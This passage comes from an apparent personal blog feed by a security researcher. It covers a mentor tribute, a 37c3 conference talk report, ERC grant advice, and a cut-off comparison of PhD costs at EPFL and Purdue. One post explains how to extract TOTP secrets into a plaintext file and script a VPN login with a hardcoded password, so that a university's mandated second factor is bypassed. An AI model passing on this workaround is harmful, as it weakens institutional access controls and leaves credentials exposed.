&lt;p&gt;When I started my computer science studies at ETH Zurich in 2001, he was already retired but ever present in the ETH INF cafeteria and I remember discussing undergraduate studies with him.
Apart from BASIC and assembly, Pascal was the first real programming language I learned in early high school and its design principles guided my future career.
I loved hacking code and believe that Pascal was instrumental in guiding me into computer science as a field and then systems and security as my research area.
During my PhD, we had several discussions regarding systems and efficiency.
I clearly remember one discussion we had about the complexities of runtime systems with a particular focus on the libc.
While the interactions became less frequent as he &amp;quot;retired&amp;quot; and only sporadically visited ETH, his legacy will remain influential: for security, simplicity is always better than bloat!&lt;/p&gt;
</content><category term="Academia"></category><category term="mentor"></category><category term="death"></category></entry><entry><title>37c3: Chaos returning to Hamburg</title><link href="/blog/2023/1230-37c3.html" rel="alternate"></link><published>2023-12-30T21:29:00-05:00</published><updated>2023-12-30T21:29:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2023-12-30:/blog/2023/1230-37c3.html</id><summary type="html">&lt;p&gt;After a three-year hiatus due to the pandemic, the Chaos Communication Congress is finally back at an onsite venue.
For those that don't know, the congress is the biggest hacker Conference in Europe.
It is known not just for deep technical talks and amazing hacks but also for political talks …&lt;/p&gt;</summary><content type="html">&lt;p&gt;After a three-year hiatus due to the pandemic, the Chaos Communication Congress is finally back at an onsite venue.
For those who don't know, the congress is the biggest hacker conference in Europe.
It is known not just for deep technical talks and amazing hacks but also for political talks and a positive and inclusive community.
This year, the congress moved back from the Messe in Leipzig to the CCH in Hamburg.
After outgrowing the congress center in Berlin (with around 3,000 to 4,000 attendees), the congress quickly expanded in Hamburg, reaching 12,000 attendees before relocating to Leipzig due to lack of space.
After three years of sadness, we're back in Hamburg.
The CCH was finally renovated and offers a bit more space, larger lecture halls, and more room for assemblies.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2023/1230/congress.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;After I arrived around noon on December 27, the first impression was somewhat disappointing.
Compared to earlier years, there were much fewer installations and much less (for lack of a better word) &amp;quot;spirit&amp;quot;.
While the congress always was and always will be chaotic, this year there seemed to be much less energy.
Luckily over the next couple of days, the spirit picked up and people started building and constructing things.
Let's hope that the community rediscovers the energy that made the congress such an amazing experience.&lt;/p&gt;
&lt;div class="section" id="day-1-familiarization"&gt;
&lt;h2&gt;Day 1: Familiarization&lt;/h2&gt;
&lt;p&gt;The first day usually follows a slow start to get into the congress mood.
Assemblies are still built up, people find their place and bearings, and the first talks are being watched.
This year, I arrived a little late but quickly got settled so that I could start with a couple of fun talks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apple's iPhone 15: Under the C&lt;/strong&gt;: stacksmashing talks about difficulties with new iPhones where the connection to the system is now over USB-C instead of the proprietary cable. This change made a lot of reverse engineering tools useless. After a short background on the history of iPhone hacking, he goes into detail on how to uncover hidden interfaces when interacting with the new iPhone 15. The talk is recommended for hardware and iPhone hackers, and generally because stacksmashing is an amazing speaker.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Toniebox Reverse Engineering&lt;/strong&gt;: this talk focused on reverse engineering the Toniebox ecosystem.
A Toniebox is an audio player for kids.
Using little figurines (with embedded NFC tags) kids can select the story or music they want to play.
By tapping left and right the kids can advance to the next song or go back.
Similarly, two ears allow the kids to increase and decrease the volume.
The hackers completely reverse-engineered the Tonie ecosystem, from the &amp;quot;locked&amp;quot; NFC tag and how to clone it, to how they can intercept any interaction of the Toniebox with the backend servers.
Interestingly, this allowed them a full compromise of the system including the ability to have an alternate backend server.
Apart from fully compromising the Tonie ecosystem (which is an amazing hack), the researchers also discovered that Tonieboxes have extensive logging facilities.
Every single button press, Tonie change, and interaction is sent to the Tonie server, resulting in a huge privacy violation.
Just for this discussion, it is worth watching the talk!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adventures in Reverse Engineering Broadcom NIC&lt;/strong&gt;: Hugo went on a journey of writing an open driver for Broadcom NICs.
In the talk, he focused on some of the difficulties in how the NIC is set up and how the interaction between different parts (and ports) of the NIC works.
Apart from lots of details on opaque-box engineering, I found it most interesting that these NICs have chips with several different architectures that interact with each other.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Breaking &amp;quot;DRM&amp;quot; in Polish trains&lt;/strong&gt;: this talk was one of the highlights of 37c3 for me.
A service station for trains discovered that trains from another manufacturer stopped working after being serviced in their shop, only returning to service after the original manufacturer was paid a ransom.
The repair shop called on dragonsector, the top Polish CTF team, to investigate.
The hackers discovered that the manufacturer introduced several kill switches and geo-fencing to prohibit repair from other shops.
Luckily, the hackers also discovered some opportunities to get around these kill switches and restore the functionality of the train.
The audacity of the original manufacturer is as mind-boggling as the awesomeness of dragonsector.
A must-watch!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kein(!) Hacker Jeopardy&lt;/strong&gt;: instead of the beloved hacker jeopardy, Ray tried a different game this year following the '90s game show &amp;quot;Ruck Zuck&amp;quot;.
While the people played along, &amp;quot;Hack Zuck&amp;quot; was not nearly as much fun as hacker jeopardy because the audience could not guess along.
I hope that hacker jeopardy will return next year!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-2-exploration"&gt;
&lt;h2&gt;Day 2: Exploration&lt;/h2&gt;
&lt;p&gt;On the second day, I started exploring the congress center a bit more but also found time for a few talks.
The second day is usually the peak: one still has enough energy to push while already being familiar with the venue.
It was good to see several art projects being built up and the congress center slowly turned into a hack center.
Apart from watching talks, I also soldered a badge --- the Blinkenrocket --- and played with the badge software a bit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why Railway is safe but not secure&lt;/strong&gt;: Katja gave a nice overview of how &amp;quot;security&amp;quot; is integrated (or not) into rail systems.
Railways focus on safety but not security (or privacy) per se.
Rooted in mechanical and electrical engineering rather than computer science, railway engineering focuses on physical safety but is somewhat oblivious to computer security.
If security standards are defined, they often hardcode ciphers without clearly specifying attack models.
Katja therefore called for a rethinking of security for railway systems and more discussion between computer security and railway folks.
The talk somewhat reminded me of Stefan Katzenbeisser's talk several years ago which also held up quite well.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fuzz everything, everywhere, all at once&lt;/strong&gt;: The LibAFL and AFL++ authors gave a great talk introducing the AFL++/LibAFL framework.
Along with discussing hard-to-fuzz targets such as firmware or embedded systems, they also discussed how fuzzers can be customized and improved.
Overall a good overview for people not necessarily new to fuzzing but new to LibAFL.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Nintendo hacking 2023: 2008&lt;/strong&gt;: PoroCYon introduced us to the Nintendo DSi and its peculiarities.
After discussing the hardware details and previous hacking attempts, he went deep into the weeds of the different subsystems.
Using glitching, PoroCYon managed to dump the firmware and discover interesting attack points which allowed him to finally build a modchip for the DSi.
Great low-level talk with lots of embedded systems and ARM details.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Demoscene now and then&lt;/strong&gt;: amazing talk about the demo scene with lots of demos. Must watch as entertainment and to get into the scene.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ARMore: Pushing love back into binaries&lt;/strong&gt;: Luca's talk on how to efficiently rewrite ARM binaries statically.
After discussing the challenges of rewriting aarch64 binaries, Luca explained how he solved them using a combination of a rebound table, execute-only memory, and careful rewriting.
The live version of the talk was a bit broken due to a continuous silent fire alarm that turned off the audio for about 1/3 of the time.
Watch for an introduction to ARM assembly and rewriting.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2023/1230/armore.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;BLUFFS: Bluetooth forward and future secrecy attacks and defenses&lt;/strong&gt;: Daniele introduced his recent BLUFFS attacks against the Bluetooth standard compromising forward secrecy and future secrecy.
Attacks against the Bluetooth standard are universal and work on all implementations (that faithfully implement the standard); they are therefore extremely severe and hard to patch.
Oddly, the Bluetooth standard so far did not discuss forward and future secrecy and therefore missed protecting against those types of attacks.
Daniele mentioned that he discovered these issues while playing with older attacks, replaying them, and fiddling with bits in the protocol setup.
It's somewhat surprising that such heavy attacks exist in the Bluetooth standard despite the large consortium and many researchers analyzing the protocol.
Very likely, there are many more such bugs lurking, so this may serve as a call to action for other researchers!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FNORD Jahresrückblick&lt;/strong&gt;: The FNORD news show is usually a great review of the past year.
This year, Fefe and Frank tried to review the past four years to highlight the main themes and issues.
The first hour was quite entertaining but then the news got a bit repetitive.
Maybe I was too tired or reviewing four years is just too much?
In any case, I look forward to the next show next year that only covers one year!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-3-exploitation"&gt;
&lt;h2&gt;Day 3: Exploitation&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Fuzzing the TCP/IP stack&lt;/strong&gt;: Ilja is known for great talks and deep knowledge of software and systems security, so this talk was a must for me.
Especially as Ilja wanted to talk about fuzzing TCP/IP stacks, I was even more excited.
Sadly, Ilja did not get too far into details.
He gave an overview of simple fuzzing techniques and highlighted the need for stateful fuzzing for network stacks.
Unfortunately, he could not finish the implementation of his fuzzer and therefore wasn't able to highlight any cool findings.
Overall a topic with lots of potential but I was a bit disappointed by the talk.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Full AACSess: Exposing and exploiting AACSv2 UHD DRM for your viewing pleasure&lt;/strong&gt;: Adam gave an amazing talk about breaking DRM.
Contrary to the title, this talk did not just focus on AACSv2 but Adam started with earlier systems such as CSS, and how they were broken.
The team fully broke AACSv2 using a combination of reverse engineering, protocol analysis, and lots and lots of patience.
Apart from all the cool technical details, a highlight for me was the primer on SGX remote attestation and how it can be broken through side channels.
They even demonstrated how they can extract the core keys for the whole DRM scheme using an attack against Intel SGX.
Watch this talk for details on DRM protocols, SGX remote attestation, and lots of breakage.
This was my second favorite talk of the congress.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Finding vulnerabilities in Internet-Connected Devices&lt;/strong&gt;: The two researchers focused on the Poly ecosystem of conference phones (for Zoom and MS Teams calls) and demonstrated the insecurity of the IoT ecosystem.
By focusing on a simple example, they highlighted some of the cool attack vectors along with their thought process.
Good introductory talk into IoT hacking.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Writing secure software&lt;/strong&gt;: Fefe's talk about how to write secure software using his blog as an example.
In short, the key takeaways can be summarized as (i) good threat modeling, (ii) reducing attack surface, (iii) compartmentalization, and (iv) append-only storage.
I enjoyed the talk even though some parts felt a bit artificial.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What your phone won't tell you&lt;/strong&gt;: Lukas talks about how to discover fake base stations.
Using a query service and a set of simple rules, phones can detect if fake base stations are nearby and potentially alert users.
The rules seemed a bit simplistic but likely will work reasonably well.
As it turns out, crowd-sourcing measurements and sharing data of observed base stations can be used nicely to mitigate potential attacks.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-4-departation"&gt;
&lt;h2&gt;Day 4: Departation&lt;/h2&gt;
&lt;p&gt;After three days full of talks, the fourth day focused mainly on non-technical talks.
As I was not interested in them, I enjoyed the opportunity to socialize, connect, discuss, mingle, and hack.
While the talks at the congress are always amazing, it's important to focus on the social aspects as well.
In my opinion, the congress provides this amazing opportunity to interact with the hacker community and to learn.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2023/1230/hamburg.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The congress is always more than just the talks.
It's about meeting friends, forming connections, hacking some code at 4 in the morning after dancing in the club, and watching the occasional talk.
I'll see you there next year with new talks, renewed energy, and lots of community spirit!
So long, and see you next year at the congress!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="security"></category><category term="congress"></category><category term="37c3"></category><category term="ccc"></category><category term="privacy"></category></entry><entry><title>Writing (successful) ERC grants in Europe</title><link href="/blog/2022/0906-ERC_grant.html" rel="alternate"></link><published>2022-09-06T15:09:00-04:00</published><updated>2022-09-06T15:09:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2022-09-06:/blog/2022/0906-ERC_grant.html</id><summary type="html">&lt;p&gt;In 2018, when I moved from Purdue University in the US to EPFL in Switzerland, I
had the opportunity to apply for an ERC H2020 starting grant in computer
science. ERC starting grants are similar to the NSF Career award and can be
submitted up to 7 years after completing …&lt;/p&gt;</summary><content type="html">&lt;p&gt;In 2018, when I moved from Purdue University in the US to EPFL in Switzerland, I
had the opportunity to apply for an ERC H2020 starting grant in computer
science. ERC starting grants are similar to the NSF Career award and can be
submitted up to 7 years after completing the PhD, i.e., your clock starts
ticking on the date you passed your PhD defense. Given the timing of my move
back, I had one single shot and had to make it count.&lt;/p&gt;
&lt;p&gt;The ERC Starting Grant (StG) is the most prestigious single PI award available
in Europe and the competition is fierce. Only about 10% of applications actually
win the award, and most applicants can only apply a total of 2-3 times. While the
NSF Career comes with roughly $500,000 in funding, the StG comes with EUR 1,500,000,
which suffices for roughly 3 PhD students plus one postdoc over the 5-year
lifetime of the award in Switzerland.&lt;/p&gt;
&lt;p&gt;The evaluation of the submissions happens in two stages. Applicants submit a
5-page abstract and a 15-page proposal. In the first stage, the abstract along
with the applicant's CV is evaluated with roughly 20-25% of candidates
progressing to the second stage. The first stage is primarily a selection based
on the candidate's background and the rough idea of the project. While having a
solid abstract is necessary, sufficient background is a must. Candidates that
don't have the right standing regarding prior published papers are unlikely to
make it.&lt;/p&gt;
&lt;p&gt;In the second stage, both parts (i.e., abstract and main proposal) are sent out
for review and the candidate is then invited to present their project in front
of a broad committee using a short presentation. The questioning in the
committee is fierce as all the different areas are covered at the same time,
with competition both between and within areas.&lt;/p&gt;
&lt;p&gt;In my opinion, the main reasons why my proposal was successful were that a) I got
friendly feedback from peers and b) I dedicated a sufficient amount of time to
writing.&lt;/p&gt;
&lt;p&gt;Writing such a highly competitive proposal is not a weekend rush job but
requires careful planning. I started about 5 months before the deadline and
spent a good 3 months writing and getting feedback. Without the feedback,
discussions, dry-runs, and interactions of my peers, it would have been
impossible to win this award.&lt;/p&gt;
&lt;p&gt;To those asking for tips on their proposals, I suggest the following four key
tips:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Plan at least 3 months of full time writing and preparation with 5 months
overall.&lt;/li&gt;
&lt;li&gt;Ask colleagues in your area (and at your school) for proposals. Make sure
to look at both successful and unsuccessful proposals.&lt;/li&gt;
&lt;li&gt;Brainstorm ideas with colleagues, friends, and successful peers. Work on your
5min pitch and make it solid.&lt;/li&gt;
&lt;li&gt;Get iterative feedback from colleagues during your 3 months of writing. Ask
for feedback on your drafts and discuss them in detail.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Most universities (or countries) also offer general training and information
about the ERC StG. I took part in two such seminars: one for Switzerland and the
other local to EPFL. The seminar for all researchers in Switzerland was rather
broad but contained a lot of baseline information that was valid across all
fields (i.e., from physics through biology to computer science). As practices vary
across these fields, the information is rather general but still useful to get a
good overview. Similarly, talking to other awardees and candidates allows you to
get into the mood of writing proposals. The EPFL seminar was very tailored
towards technical universities and I got good information from our research
office on how to customize and specialize. Still, the information was rather broad
but gave me a good perspective. What helped me most though was the feedback from
my peers and friends in security and my colleagues at the CS department.&lt;/p&gt;
&lt;p&gt;I spent the first two months simply asking my colleagues and friends for copies
of their proposals, studied the outlines/structures, and asked for what they
thought made their proposal successful. This gave me a great overview and idea
of what to focus on (and what not). This initial setup phase was incredibly
useful to set the scene of my proposal and to understand the trade-offs
between different aspects.&lt;/p&gt;
&lt;p&gt;After two months of distillation and some pitching to these peers, I was in the
right mindset to start teasing out an outline and draft that I continuously
checked with my peers. Every couple of weeks I asked for feedback from someone
else. I pre-aligned the timeline to make sure to get timely feedback and to not
annoy my friends too much with my requests. This continuous feedback helped me
stay focused and allowed me to tailor the proposal to current trends.&lt;/p&gt;
&lt;p&gt;Don't underestimate the amount of time it takes to write the proposal. And don't
be shy to scrap text and rewrite sections. I dropped whole work packages and
rewrote them, or replaced them with (hopefully better) ideas. Text is volatile,
adjust, adapt, and massage it to make it better.&lt;/p&gt;
&lt;p&gt;Looking back, while I had the necessary background to pass the first stage, I
was extremely lucky to pass the interview and second stage. Being at EPFL was
certainly a boost for the first stage and I also had PhD students from my time
at Purdue who had already graduated with excellent publications, so my initial
setup was good. My proposal was reasonable and I got a lot of feedback. A couple
of years later, I would clarify some aspects and better cater to the diverse
committee but overall it was evidently good enough.&lt;/p&gt;
&lt;p&gt;Submitting an ERC StG proposal is a huge time commitment. Assess for yourself whether
you've got the necessary resources. If you do, don't be shy to ask for proposals
(I got about 5 different proposals from successful colleagues) and ask for
rounds of feedback and brainstorming sessions.&lt;/p&gt;
&lt;p&gt;If you win an ERC StG: congratulations, well done! If you don't, it's not the
end of the world either. With only a 10% acceptance rate, the results are random
enough that many great proposals that deserve to be accepted are rejected due
to minor hiccups or random factors. Try again if you can, or submit somewhere
else. In the end, submitting proposals as faculty is similar to submitting
papers as a student. Sometimes you win, sometimes you have to try again!&lt;/p&gt;
&lt;p&gt;If you plan to submit an StG grant, reach out and ask me questions. I'm happy to
help!&lt;/p&gt;
</content><category term="Academia"></category><category term="ERC"></category></entry><entry><title>Second factor on VPNs considered harmful</title><link href="/blog/2022/0711-2nd_shmactor.html" rel="alternate"></link><published>2022-07-11T23:35:00-04:00</published><updated>2022-07-11T23:35:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2022-07-11:/blog/2022/0711-2nd_shmactor.html</id><summary type="html">&lt;p&gt;Due to the risk of &amp;quot;cyber threats&amp;quot;, many universities are switching to second
factor authentication to log into their VPNs. Many companies moved to second
factor for VPN authentication quite some time ago to protect their perimeter
from external access. The idea is that users have to provide two factors …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Due to the risk of &amp;quot;cyber threats&amp;quot;, many universities are switching to second
factor authentication to log into their VPNs. Many companies moved to second
factor for VPN authentication quite some time ago to protect their perimeter
from external access. The idea is that users have to provide two factors to log
into the internal network (not necessarily internal services), reducing the risk
of users falling victim to phishing attacks where they leak their password.&lt;/p&gt;
&lt;p&gt;Now, in comparison to companies, which are usually a more closed environment,
universities are much more open and much more diverse. First, they often offer a
public WiFi that gives local users (in WiFi proximity) access to a somewhat
internal network. Second, there are large classes of users with tens of
thousands of students that all bring their own devices that don't run under any
corporate policy.&lt;/p&gt;
&lt;p&gt;Under such a &amp;quot;bring your own device&amp;quot; scenario, trying to protect internal
network access seems futile. Nevertheless, many universities are trying to
enforce 2nd factor authentication, thereby burning through many hours of user
time as users fetch their second factor (usually a phone) to log into the VPN.&lt;/p&gt;
&lt;p&gt;Let's see how we can make the login process a bit easier. In short, let's clone
our second factor device and automatically generate authentication codes on
demand as the VPN connection is set up.&lt;/p&gt;
&lt;div class="section" id="totp-time-based-one-time-password"&gt;
&lt;h2&gt;TOTP: Time-based One Time Password&lt;/h2&gt;
&lt;p&gt;TOTP is a simple scheme that creates a one-time password that is valid during a
short time frame. TOTP uses HOTP (hash-based one time passwords) with a rolling
epoch that serves as the HOTP counter. The secret key and the counter are fed
into HMAC-SHA1: the secret serves as the HMAC key and the counter as the
message. By default, an epoch is 30 seconds long and epochs are counted from
the start of Unix time. As an aside, plain HOTP has the advantage that using
(reading) a password synchronously updates the counter on both the verifier
and the user, ensuring that each password can only be used once.
The downside of HOTP is that the counters must stay in sync.&lt;/p&gt;
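&lt;p&gt;As an illustration (not from the original post), the whole scheme fits in a few lines of Python using only the standard library; the defaults follow RFC 6238 (HMAC-SHA1, 30-second epochs, 6 digits):&lt;/p&gt;

```python
import base64
import hashlib
import hmac
import struct
import time

def hotp(secret_b32, counter, digits=6):
    """HOTP (RFC 4226): HMAC-SHA1 over the 8-byte counter, keyed with the secret."""
    key = base64.b32decode(secret_b32.upper() + "=" * (-len(secret_b32) % 8))
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation: low nibble of last byte
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret_b32, period=30, now=None):
    """TOTP (RFC 6238): HOTP with the counter derived from Unix time."""
    counter = int((time.time() if now is None else now) // period)
    return hotp(secret_b32, counter)
```

&lt;p&gt;For a base32 secret, this should produce the same codes as &lt;tt class="docutils literal"&gt;oathtool &lt;span class="pre"&gt;-b&lt;/span&gt; &lt;span class="pre"&gt;--totp&lt;/span&gt;&lt;/tt&gt;.&lt;/p&gt;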
&lt;/div&gt;
&lt;div class="section" id="cloning-totps"&gt;
&lt;h2&gt;Cloning TOTPs&lt;/h2&gt;
&lt;p&gt;You likely have used Google Authenticator (or a similar app) to store your OTP
keys. As you will have guessed by now, you can also extract these secrets.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Fire up Google Authenticator and export your keys.&lt;/li&gt;
&lt;li&gt;Scan the QR code with another phone (or take a screenshot) and store the data
as &lt;tt class="docutils literal"&gt;my_keys.otp&lt;/tt&gt;&lt;/li&gt;
&lt;li&gt;Clone &lt;a class="reference external" href="https://github.com/scito/extract_otp_secret_keys/"&gt;extract_otp_secret_keys&lt;/a&gt;
and check that the script will not leak your secrets somewhere else&lt;/li&gt;
&lt;li&gt;Run &lt;tt class="docutils literal"&gt;python3 extract_otp_secret_keys.py my_keys.otp&lt;/tt&gt;&lt;/li&gt;
&lt;li&gt;Store your TOTP secret somewhere safe (e.g., &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;~/.totp_university&lt;/span&gt;&lt;/tt&gt;)&lt;/li&gt;
&lt;li&gt;Install &lt;tt class="docutils literal"&gt;oathtool&lt;/tt&gt; from your favorite package manager&lt;/li&gt;
&lt;li&gt;Run &lt;tt class="docutils literal"&gt;cat &lt;span class="pre"&gt;~/.totp_university&lt;/span&gt; | oathtool &lt;span class="pre"&gt;-b&lt;/span&gt; &lt;span class="pre"&gt;--totp&lt;/span&gt; -&lt;/tt&gt; to get the current OTP value&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Using the last step, you have cloned your OTP secret and replaced your phone with a
command. Well done! Now let's automate the VPN login.&lt;/p&gt;
&lt;p&gt;You can connect to your VPN with: &lt;tt class="docutils literal"&gt;openconnect &lt;span class="pre"&gt;-v&lt;/span&gt; &lt;span class="pre"&gt;-b&lt;/span&gt; vpn.uni.edu &lt;span class="pre"&gt;--authgroup&lt;/span&gt;
&amp;quot;Super Secret Name of Auth Group&amp;quot; &lt;span class="pre"&gt;--user=asdf&amp;#64;uni.edu&lt;/span&gt;&lt;/tt&gt;. To automatically
connect with TOTP you can expand the command as follows: &lt;tt class="docutils literal"&gt;echo &lt;span class="pre"&gt;-e&lt;/span&gt;
&lt;span class="pre"&gt;'YourSecredPassword\n'$(cat&lt;/span&gt; &lt;span class="pre"&gt;~/.totp_university&lt;/span&gt; | oathtool &lt;span class="pre"&gt;--totp&lt;/span&gt; &lt;span class="pre"&gt;-b&lt;/span&gt; &lt;span class="pre"&gt;-)&lt;/span&gt; | sudo
openconnect &lt;span class="pre"&gt;-v&lt;/span&gt; &lt;span class="pre"&gt;-b&lt;/span&gt; vpn.uni.edu &lt;span class="pre"&gt;--authgroup&lt;/span&gt; &amp;quot;Super Secred Name of Auth Group&amp;quot;
&lt;span class="pre"&gt;--user=asdf&amp;#64;uni.edu&lt;/span&gt; &lt;span class="pre"&gt;--passwd-on-stdin&lt;/span&gt;&lt;/tt&gt;. Now store this command in a shell
script and be happy that you neither have to remember your password nor bring
your second factor.&lt;/p&gt;
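&lt;p&gt;As a sketch of that shell script (the server name, auth group, user, and file path are the post's placeholders, not real values):&lt;/p&gt;

```shell
#!/bin/sh
# Sketch of the wrapper described above; vpn.uni.edu, the auth group,
# the user, and ~/.totp_university are the post's placeholders.
connect_vpn() {
    # Generate the current OTP from the cloned secret.
    totp=$(oathtool -b --totp "$(cat ~/.totp_university)")
    # openconnect reads the password and the OTP as two lines on stdin:
    printf '%s\n%s\n' "$VPN_PASSWORD" "$totp" | sudo openconnect -v -b \
        vpn.uni.edu --authgroup "Super Secret Name of Auth Group" \
        --user=asdf@uni.edu --passwd-on-stdin
}
```

&lt;p&gt;Keeping the password in an environment variable such as &lt;tt class="docutils literal"&gt;VPN_PASSWORD&lt;/tt&gt; (a hypothetical name) avoids hardcoding it next to the TOTP secret.&lt;/p&gt;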
&lt;/div&gt;
</content><category term="Random"></category><category term="EPFL"></category></entry><entry><title>PhD at EPFL, in Europe</title><link href="/blog/2021/0121-phd_at_epfl.html" rel="alternate"></link><published>2021-01-21T23:10:00-05:00</published><updated>2021-01-21T23:10:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2021-01-21:/blog/2021/0121-phd_at_epfl.html</id><summary type="html">&lt;p&gt;Every December a lot of prospective students reach out to faculty
regarding PhD programs. This is the time where we review the students
and assess their skills and potential along many dimensions such as past
research, research ideas, engineering capabilities, and systems
experience. These discussions along with the submission of …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Every December a lot of prospective students reach out to faculty
regarding PhD programs. This is the time when we review the students
and assess their skills and potential along many dimensions such as past
research, research ideas, engineering capabilities, and systems
experience. These discussions, along with the student's application
(consisting of grades, CV, and research statement), then culminate in
reviews by several different faculty in preparation for the EDIC
admission meeting. At the admission meeting, candidates are discussed
and eligible candidates are split into fellowship candidates and
admissible candidates.&lt;/p&gt;
&lt;p&gt;Notifications go out to students soon after the admission meeting and
the tables turn: now the students ask the questions. Many
students have several offers and now have to choose where they want to
spend the next 5-6 years of their lives. This decision is not simple and
depends on many dimensions such as group dynamics, university ranking,
location, work/life balance, and your personal constraints.&lt;/p&gt;
&lt;div class="section" id="a-phd-forms-a-long-term-professional-relationship"&gt;
&lt;h2&gt;A PhD forms a long term professional relationship&lt;/h2&gt;
&lt;p&gt;After deciding to do a PhD, the one key decision is in which group/with
which adviser you do your PhD. In order to get the most out of your PhD
it is critical to be in a comfortable and supportive environment. You
will spend the majority of your time over the next couple of years with
your colleagues in the group and will interact with your adviser
frequently. The PhD relationship will last well beyond your PhD. If you
choose to stay in academia, your adviser will continue to write letters
on your behalf at least until you complete your tenure track position.
Even if you decide to work at a company, your PhD adviser will
frequently be available as a mentor and will continue to advise you.
Figure out if you’ll be able to work together by asking questions about
the work environment, advising style, and group relationships. Interview
both the adviser and the group. In my group, I try to talk to potential
candidates several times: both before the committee makes the decision
but also after they get an offer to allow them to decide if my group is
a good fit. After receiving an offer, use this opportunity to connect,
network, and to ask questions. Maybe even ask to be part of one of the
group meetings.&lt;/p&gt;
&lt;p&gt;In addition to questions on research topics in a group and advising
style, students often worry about the cost of living, language
requirements, or course requirements. Let me try to compare EPFL to US
universities. Note that I spent 2012 to 2018 in the US system,
both at UC Berkeley (in the expensive Bay Area) and at Purdue University
(in the cheaper Midwest), and can therefore compare the range of options. As a
baseline, I’ll compare to Purdue University.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="salary-and-fixed-costs"&gt;
&lt;h2&gt;Salary and fixed costs&lt;/h2&gt;
&lt;p&gt;The yearly salary at EPFL ranges from 52,400 CHF in the first year to
55,400 CHF in the fourth and later years. In addition to your salary,
EPFL pays social insurance, unemployment insurance, and retirement funds
of around 9000 CHF per year. At Purdue, the yearly salary is around
19,000 US$. At the given incomes, the taxes in both countries are around 10%.
Studying at a university often involves some form of
additional fees. At EPFL you may pay 200-300 CHF per year to access the
university sport facilities, while at Purdue different university fees
for PhD students sum up to around 2,000 US$. Both in Switzerland and in
the US, health insurance is mandatory and comes at around 3,600 CHF per
year in Switzerland and 600 US$ per year in the US (in the US, the
employer pays a large chunk of healthcare costs as benefits). Both in
Switzerland and in the US, your largest fixed cost will be housing. A
room in a shared apartment (you have a private room with shared kitchen
and bathroom) will be between 700 CHF and 1,000 CHF, while a studio (your
own private apartment with a bedroom and a common area) will be around
800 CHF to 1,200 CHF per month. Of course, you’ll find apartments that
are much more expensive too, e.g., if you prefer lake view. In the US,
you generally pay 100-300 US$ less per month for your apartment. Fiber
internet is around 50 CHF per month and a mobile phone plan is around
20-30 CHF per month. Public transport is around 80 CHF per month.&lt;/p&gt;
&lt;table border="1" class="docutils"&gt;
&lt;colgroup&gt;
&lt;col width="58%" /&gt;
&lt;col width="20%" /&gt;
&lt;col width="22%" /&gt;
&lt;/colgroup&gt;
&lt;thead valign="bottom"&gt;
&lt;tr&gt;&lt;th class="head"&gt;Yearly budget&lt;/th&gt;
&lt;th class="head"&gt;EPFL (CHF)&lt;/th&gt;
&lt;th class="head"&gt;Purdue (US$)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td&gt;Salary&lt;/td&gt;
&lt;td&gt;52,400&lt;/td&gt;
&lt;td&gt;19,000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Taxes&lt;/td&gt;
&lt;td&gt;10% (5,240)&lt;/td&gt;
&lt;td&gt;10% (1,900)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Housing&lt;/td&gt;
&lt;td&gt;12,000&lt;/td&gt;
&lt;td&gt;9,600&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Health insurance&lt;/td&gt;
&lt;td&gt;3,600&lt;/td&gt;
&lt;td&gt;600&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;University fees&lt;/td&gt;
&lt;td&gt;0-200&lt;/td&gt;
&lt;td&gt;2,000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Fiber and mobile&lt;/td&gt;
&lt;td&gt;840&lt;/td&gt;
&lt;td&gt;840&lt;/td&gt;
&lt;/tr&gt;
